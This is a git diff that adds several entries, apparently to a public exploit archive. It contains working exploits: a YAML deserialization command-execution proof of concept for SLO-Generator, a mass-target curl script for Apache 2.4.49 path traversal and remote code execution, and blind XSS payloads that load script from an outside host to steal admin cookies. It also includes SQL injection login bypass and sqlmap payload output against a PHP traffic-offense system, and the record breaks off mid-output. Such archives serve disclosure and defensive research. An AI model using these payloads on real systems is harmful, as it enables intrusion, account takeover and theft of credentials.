diff --git a/exploits/linux/local/50385.txt b/exploits/linux/local/50385.txt
new file mode 100644
index 000000000..e570ab4c3
--- /dev/null
+++ b/exploits/linux/local/50385.txt
@@ -0,0 +1,24 @@
+# Exploit Title: Google SLO-Generator 2.0.0 - Code Execution
+# Date: 2021-09-28
+# Exploit Author: Kiran Ghimire
+# Software Link: https://github.com/google/slo-generator/releases
+# Version: <= 2.0.0
+# Tested on: Linux
+# CVE: CVE-2021-22557
+
+##############################################################################
+
+*Introduction*:
+Is a tool to compute and export Service Level Objectives (SLOs), Error
+Budgets and Burn Rates, using configurations written in YAML (or JSON)
+format.
+
+##############################################################################
+
+*POC:*
+1. pip3 install slo-generator==2.0.0
+2. 2. Save the below yaml code in a file as exploit.yaml.
+   !!python/object/apply:os.system ["id;whoami"]
+3.  Run the below command
+   slo-generator migrate -b exploit.yaml
+##############################################################################
\ No newline at end of file
diff --git a/exploits/multiple/webapps/50383.sh b/exploits/multiple/webapps/50383.sh
index aea6670d4..6c233d6fd 100755
--- a/exploits/multiple/webapps/50383.sh
+++ b/exploits/multiple/webapps/50383.sh
@@ -1,4 +1,4 @@
-# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal
+# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)
 # Date: 10/05/2021
 # Exploit Author: Lucas Souza https://lsass.io
 # Vendor Homepage:  https://apache.org/
@@ -9,10 +9,14 @@
 
 #!/bin/bash
 
-if [[ $1 =3D=3D '' ]]; [[ $2 =3D=3D '' ]]; then
-echo Set [TAGET-LIST.TXT] [PATH]
+if [[ $1 == '' ]]; [[ $2 == '' ]]; then
+echo Set [TAGET-LIST.TXT] [PATH] [COMMAND]
 echo ./PoC.sh targets.txt /etc/passwd
 exit
 fi
 for host in $(cat $1); do
-curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done
\ No newline at end of file
+echo $host
+curl --proxy http://192.168.72.1:8080 -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done
+
+# PoC.sh targets.txt /etc/passwd
+# PoC.sh targets.txt /bin/sh whoami
\ No newline at end of file
diff --git a/exploits/php/webapps/50386.txt b/exploits/php/webapps/50386.txt
new file mode 100644
index 000000000..0813d0872
--- /dev/null
+++ b/exploits/php/webapps/50386.txt
@@ -0,0 +1,49 @@
+# Exploit Title: Online DJ Booking Management System 1.0 - 'Multiple' Blind Cross-Site Scripting
+# Date: 2021-10-06
+# Exploit Author: Yash Mahajan
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/online-dj-booking-management-system-using-php-and-mysql/
+# Version: V 1.0
+# Vulnerable endpoint: http://localhost/odms/book-services.php?bookid=1
+# Vulnerable Page URI : http://localhost/odms/admin/view-booking-detail.php?editid=10&&bookingid=989913724
+# Tested on Windows 10, XAMPP
+
+*Steps to Reproduce:*
+1) Navigate http://localhost/odms/book-services.php?bookid=1
+2) Enter Blind Xss payload `"><script+src=https://yourxsshunterusername.xss.ht>` in "name=","vaddress=" and "addinfo=" parameters and click on "Book".
+
+Request:
+========
+
+POST /odms/book-services.php?bookid=1 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 335
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/odms/book-services.php?bookid=1
+Cookie: PHPSESSID=crj216nrjq751tt0gs4o92undb
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+
+name="><script+src=https://biest.xss.ht></script>&email=aa@gg.com&mobnum=9999999999
+&edate=2000-10-24&est=6+p.m&eetime=1+p.m&vaddress="><script+src=https://biest.xss.ht></script>
+&eventtype=Pre+Engagement&addinfo="><script+src=https://biest.xss.ht></script>&submit=Book
+
+
+Now to confirm the vulnerability
+
+3) Login as admin by navigating to http://localhost/odms/admin/login.php.
+4) Now as soon as admin visits /view-booking-detail.php to approve the booking, payload fires and attacker will get the details like ip address, cookies of admin
+5) Able to steal admin's cookies successfully!!
+
+#POC
+https://ibb.co/Vj3jn2d
+https://ibb.co/bm9MGdG
\ No newline at end of file
diff --git a/exploits/php/webapps/50387.txt b/exploits/php/webapps/50387.txt
new file mode 100644
index 000000000..e6bd05373
--- /dev/null
+++ b/exploits/php/webapps/50387.txt
@@ -0,0 +1,1191 @@
+# Exploit Title: Online Traffic Offense Management System 1.0 - Multiple SQL Injection (Unauthenticated)
+# Date: 07/10/2021
+# Exploit Author: Hubert Wojciechowski
+# Contact Author: snup.php@gmail.com
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
+# Version: 1.0
+# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+
+### SQL Injection
+
+# All requests can be sent by both an authenticated and a non-authenticated user
+
+# Example vulnerable pages and parameters:
+
+* http://localhost/traffic_offense/classes/Users.php
+  Parameters:
+  - id
+  - firstname
+  - lastname
+  - username
+
+* http://localhost/traffic_offense/classes/Login.php
+  Parameters:
+  - username
+  - password
+
+* http://localhost/traffic_offense/*/&id=1 [all pages where the id parameter is present]
+  Parameters:
+  - id
+
+* http://localhost/traffic_offense/classes/Master.php
+  Parameters:
+  - id
+  - date_created
+  - ticket_no
+  - status
+  - offense_id
+  - fine
+  - code
+  - name
+
+-----------------------------------------------------------------------------------------------------------------------
+# POC
+-----------------------------------------------------------------------------------------------------------------------
+
+## Example 1
+
+# Login request generate sql injection error
+
+POST /traffic_offense/classes/Login.php?f=login HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: */*
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 30
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/traffic_offense/admin/login.php
+Cookie: PHPSESSID=5vr3fm16tmrncov6j4amftftmi
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+username=xxxx'&password=xxxx2'
+
+-----------------------------------------------------------------------------------------------------------------------
+# Response
+
+HTTP/1.1 200 OK
+Date: Wed, 06 Oct 2021 12:31:03 GMT
+Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+X-Powered-By: PHP/7.4.23
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Access-Control-Allow-Origin: *
+Content-Length: 265
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+<br />
+<b>Notice</b>:  Trying to get property 'num_rows' of non-object in <b>C:\xampp\htdocs\traffic_offense\classes\Login.php</b> on line <b>22</b><br />
+{"status":"incorrect","last_qry":"SELECT * from users where username = 'xxxx'' and password = md5('xxxx2'') "}
+
+-----------------------------------------------------------------------------------------------------------------------
+# Exploitable request - login parameter can be any value
+
+POST /traffic_offense/classes/Login.php?f=login HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: */*
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 47
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/traffic_offense/admin/login.php
+Cookie: PHPSESSID=5vr3fm16tmrncov6j4amftftmi
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+username=admin&password=xxxx')+or+'1'='1'+and+('1
+
+-----------------------------------------------------------------------------------------------------------------------
+# Response
+
+HTTP/1.1 200 OK
+Date: Wed, 06 Oct 2021 12:24:50 GMT
+Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+X-Powered-By: PHP/7.4.23
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Access-Control-Allow-Origin: *
+Content-Length: 20
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+{"status":"success"}
+
+-----------------------------------------------------------------------------------------------------------------------
+Logged as admin account
+
+-----------------------------------------------------------------------------------------------------------------------
+
+## Example 2
+
+# Sql injection detection on the example of pages with the id parameter
+
+# Login request generate sql error - add ' next to the id parameter
+
+GET /traffic_offense/admin/offenses/view_details.php?id=3' HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: */*
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Connection: close
+Referer: http://localhost/traffic_offense/admin/?page=offenses/manage_record
+Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+#Response from database - sql error
+
+HTTP/1.1 200 OK
+Date: Thu, 07 Oct 2021 03:56:37 GMT
+Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+X-Powered-By: PHP/7.4.23
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Access-Control-Allow-Origin: *
+Content-Length: 7837
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''3''' at line 1
+SELECT r.*,d.license_id_no, d.name as driver from `offense_list` r inner join `drivers_list` on r.driver_id = d.id where r.id = '3'' <br />
+<b>Notice</b>:  Trying to get property 'num_rows' of non-object in <b>C:\xampp\htdocs\traffic_offense\admin\offenses\view_details.php</b> on line <b>10</b><br />
+<br />
+<b>Notice</b>:  Trying to get property 'num_rows' of non-object in <b>C:\xampp\htdocs\traffic_offense\admin\offenses\view_details.php</b> on line <b>16</b>
+[...]
+
+# Request - add '' next to the id parameter
+
+GET /traffic_offense/admin/offenses/view_details.php?id=3'' HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Accept: */*
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+X-Requested-With: XMLHttpRequest
+Connection: close
+Referer: http://localhost/traffic_offense/admin/?page=offenses/manage_record
+Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7
+Sec-Fetch-Dest: empty
+Sec-Fetch-Mode: cors
+Sec-Fetch-Site: same-origin
+
+# Response did not return an error - sql injection confirmed
+
+HTTP/1.1 200 OK
+Date: Thu, 07 Oct 2021 03:58:40 GMT
+Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+X-Powered-By: PHP/7.4.23
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Access-Control-Allow-Origin: *
+Content-Length: 7214
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+<div class="container-fluid">
+    <div class="w-100 d-flex justify-content-end mb-2">
+        <button class="btn btn-flat btn-sm btn-default bg-lightblue" type="button" id="print"><i class="fa fa-print"></i> Print</button>
+        <button class="btn btn-flat btn-sm btn-default bg-black" data-dismiss="modal"><i class="fa fa-times"></i> Close</button>
+    </div>
+[...]
+
+-----------------------------------------------------------------------------------------------------------------------
+
+## Example 3
+
+# Using sqlmap on an intercepted request http://localhost/traffic_offense/classes/Master.php
+
+POST /traffic_offense/classes/Master.php?f=save_offense_record HTTP/1.1
+Origin: http://localhost
+Content-Length: 1598
+Accept-Language: pl,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Sec-Fetch-Site: same-origin
+Host: localhost:80
+Accept: application/json, text/javascript, */*; q=0.01
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
+Connection: close
+X-Requested-With: XMLHttpRequest
+Sec-Fetch-Mode: cors
+Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7
+Referer: http://localhost/traffic_offense/admin/?page=offenses/manage_record&id=1
+Content-Type: multipart/form-data; boundary=---------------------------7900788429998101281579901385
+Sec-Fetch-Dest: empty
+
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="id"
+
+1*
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="date_created"
+
+2021-08-18T15:00*
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="ticket_no"
+
+12345678
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="driver_id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_id"
+
+OFC-789456123
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_name"
+
+George
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="status"
+
+1*
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+1*
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+652*
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+3*
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+1001*
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="total_amount"
+
+1651
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="remarks"
+
+Sample
+-----------------------------7900788429998101281579901385--
+
+# Using the sqlmap utility
+
+C:\Users\Hubert\Desktop\sqlmapproject-sqlmap-24e3b6a>sqlmap.py --level=5 --risk=3 --dbms=MySQL -r C:\Users\Hubert\Desktop\0day\sql2 --proxy=http://127.0.0.1:8090
+        ___
+       __H__
+ ___ ___[']_____ ___ ___  {1.5.9.6#dev}
+|_ -| . [)]     | .'| . |
+|___|_  [']_|_|_|__,|  _|
+      |_|V...       |_|   https://sqlmap.org
+
+[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
+
+[*] starting @ 05:52:47 /2021-10-07/
+
+[05:52:47] [INFO] parsing HTTP request from 'C:\Users\Hubert\Desktop\0day\sql2'
+custom injection marker ('*') found in POST body. Do you want to process it? [Y/n/q]
+
+Multipart-like data found in POST body. Do you want to process it? [Y/n/q]
+
+[05:52:51] [INFO] testing connection to the target URL
+[...]
+---
+Parameter: MULTIPART #4* ((custom) POST)
+    Type: boolean-based blind
+    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+    Payload: -----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="date_created"
+
+2021-08-18T15:00
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="ticket_no"
+
+12345678
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="driver_id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_id"
+
+OFC-789456123
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_name"
+
+George
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="status"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+652' RLIKE (SELECT (CASE WHEN (8015=8015) THEN '' ELSE 0x28 END)) AND 'howi'='howi
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+3
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+1001
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="total_amount"
+
+1651
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="remarks"
+
+Sample
+-----------------------------7900788429998101281579901385--
+
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Payload: -----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="date_created"
+
+2021-08-18T15:00
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="ticket_no"
+
+12345678
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="driver_id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_id"
+
+OFC-789456123
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_name"
+
+George
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="status"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+652' AND (SELECT 4940 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(4940=4940,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'zvbh'='zvbh
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+3
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+1001
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="total_amount"
+
+1651
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="remarks"
+
+Sample
+-----------------------------7900788429998101281579901385--
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: -----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="date_created"
+
+2021-08-18T15:00
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="ticket_no"
+
+12345678
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="driver_id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_id"
+
+OFC-789456123
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_name"
+
+George
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="status"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+652' AND (SELECT 7241 FROM (SELECT(SLEEP(5)))rEqK) AND 'CONm'='CONm
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+3
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+1001
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="total_amount"
+
+1651
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="remarks"
+
+Sample
+-----------------------------7900788429998101281579901385--
+
+Parameter: MULTIPART #5* ((custom) POST)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: -----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="date_created"
+
+2021-08-18T15:00
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="ticket_no"
+
+12345678
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="driver_id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_id"
+
+OFC-789456123
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_name"
+
+George
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="status"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+652
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+3' AND 4015=4015 AND 'mPLR'='mPLR
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+1001
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="total_amount"
+
+1651
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="remarks"
+
+Sample
+-----------------------------7900788429998101281579901385--
+
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Payload: -----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="date_created"
+
+2021-08-18T15:00
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="ticket_no"
+
+12345678
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="driver_id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_id"
+
+OFC-789456123
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_name"
+
+George
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="status"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+652
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+3' AND (SELECT 6830 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(6830=6830,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'pbeA'='pbeA
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+1001
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="total_amount"
+
+1651
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="remarks"
+
+Sample
+-----------------------------7900788429998101281579901385--
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: -----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="date_created"
+
+2021-08-18T15:00
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="ticket_no"
+
+12345678
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="driver_id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_id"
+
+OFC-789456123
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_name"
+
+George
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="status"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+652
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+3' AND (SELECT 5446 FROM (SELECT(SLEEP(5)))QMKi) AND 'GfhC'='GfhC
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+1001
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="total_amount"
+
+1651
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="remarks"
+
+Sample
+-----------------------------7900788429998101281579901385--
+
+Parameter: MULTIPART #6* ((custom) POST)
+    Type: boolean-based blind
+    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+    Payload: -----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="date_created"
+
+2021-08-18T15:00
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="ticket_no"
+
+12345678
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="driver_id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_id"
+
+OFC-789456123
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_name"
+
+George
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="status"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+652
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+3
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+1001' RLIKE (SELECT (CASE WHEN (7186=7186) THEN '' ELSE 0x28 END)) AND 'rwJI'='rwJI
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="total_amount"
+
+1651
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="remarks"
+
+Sample
+-----------------------------7900788429998101281579901385--
+
+    Type: error-based
+    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Payload: -----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="date_created"
+
+2021-08-18T15:00
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="ticket_no"
+
+12345678
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="driver_id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_id"
+
+OFC-789456123
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_name"
+
+George
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="status"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+652
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+3
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+1001' AND (SELECT 2971 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(2971=2971,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OeqR'='OeqR
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="total_amount"
+
+1651
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="remarks"
+
+Sample
+-----------------------------7900788429998101281579901385--
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: -----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="date_created"
+
+2021-08-18T15:00
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="ticket_no"
+
+12345678
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="driver_id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_id"
+
+OFC-789456123
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_name"
+
+George
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="status"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+652
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="offense_id[]"
+
+3
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="fine[]"
+
+1001' AND (SELECT 5527 FROM (SELECT(SLEEP(5)))GfWJ) AND 'GtGB'='GtGB
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="total_amount"
+
+1651
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="remarks"
+
+Sample
+-----------------------------7900788429998101281579901385--
+
+Parameter: MULTIPART #2* ((custom) POST)
+    Type: boolean-based blind
+    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+    Payload: -----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="date_created"
+
+2021-08-18T15:00
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="ticket_no"
+
+12345678
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="driver_id"
+
+1
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_id"
+
+OFC-789456123
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="officer_name"
+
+George
+-----------------------------7900788429998101281579901385
+Content-Disposition: form-data; name="status"
